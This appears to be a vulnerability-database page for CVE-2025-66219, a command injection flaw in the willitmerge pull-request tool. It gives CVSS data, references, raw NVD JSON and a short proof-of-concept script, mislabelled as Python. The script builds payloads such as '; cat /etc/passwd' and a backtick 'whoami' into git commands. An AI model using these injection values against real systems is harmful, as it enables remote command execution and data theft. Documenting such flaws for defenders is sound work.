CVE-2025-66219

Description

willitmerge is a command line tool to check if pull requests are mergeable. In versions 0.2.1 and prior, there is a command Injection vulnerability in willitmerge. The vulnerability manifests in this package due to the use of insecure child process execution API (exec) to which it concatenates user input, whether provided to the command-line flag, or is in user control in the target repository. At time of publication, no known fix is public.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dontkry:willitmerge:*:*:*:*:*:node.js:*:* - VULNERABLE

willitmerge <= 0.2.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-66219 PoC - Command Injection in willitmerge
// Affected versions: willitmerge <= 0.2.1

const { exec } = require('child_process');

// Malicious input that exploits the command injection
// Using semicolon to chain commands
const maliciousInput = '; cat /etc/passwd';

// This simulates how the vulnerable code concatenates user input
const vulnerableCommand = `git status ${maliciousInput}`;

console.log('Executing vulnerable command:');
console.log(vulnerableCommand);

// The vulnerable code pattern (simplified)
// exec(vulnerableCommand, (error, stdout, stderr) => {
//   console.log(stdout);
// });

// Alternative PoC using backticks for command substitution
const maliciousInput2 = '`whoami`';
const vulnerableCommand2 = `git log ${maliciousInput2}`;

console.log('\nAlternative PoC:');
console.log(vulnerableCommand2);

// Real-world attack vector via PR/commit message
// Attacker creates a PR with malicious branch name or commit message
// When willitmerge processes this PR, the malicious input gets executed

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66219
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66219
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66219/
[4] VulDB https://vuldb.com/cve/CVE-2025-66219
[5] https://github.com/shama/willitmerge/blob/2fe91d05191fb05ac6da685828d109a3a5885028/lib/willitmerge.js#L189-L197
[6] https://github.com/shama/willitmerge/security/advisories/GHSA-j9wj-m24m-7jj6
[7] https://github.com/shama/willitmerge/security/advisories/GHSA-j9wj-m24m-7jj6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66219", "sourceIdentifier": "[email protected]", "published": "2025-11-29T02:15:52.577", "lastModified": "2025-12-19T15:52:58.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "willitmerge is a command line tool to check if pull requests are mergeable. In versions 0.2.1 and prior, there is a command Injection vulnerability in willitmerge. The vulnerability manifests in this package due to the use of insecure child process execution API (exec) to which it concatenates user input, whether provided to the command-line flag, or is in user control in the target repository. At time of publication, no known fix is public."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dontkry:willitmerge:*:*:*:*:*:node.js:*:*", "versionEndIncluding": "0.2.1", "matchCriteriaId": "252A8A35-2C13-464A-B6D1-D88B1160A2A2"}]}]}], "references": [{"url": "https://github.com/shama/willitmerge/blob/2fe91d05191fb05ac6da685828d109a3a5885028/lib/willitmerge.js#L189-L197", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/shama/willitmerge/security/advisories/GHSA-j9wj-m24m-7jj6", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/shama/willitmerge/security/advisories/GHSA-j9wj-m24m-7jj6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}